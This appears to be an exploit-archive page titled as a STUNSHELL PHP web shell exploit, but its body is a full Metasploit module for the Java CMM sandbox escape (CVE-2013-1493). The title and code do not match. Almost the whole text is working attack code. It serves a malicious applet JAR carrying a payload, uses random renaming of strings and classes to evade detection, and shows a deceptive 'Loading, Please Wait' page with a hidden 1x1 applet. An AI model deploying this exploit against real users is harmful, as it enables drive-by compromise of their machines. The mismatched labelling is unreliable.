STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped in the framework's data directory.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Serve the applet JAR containing the payload and the loaded classes
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Serve the landing page that embeds the applet
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end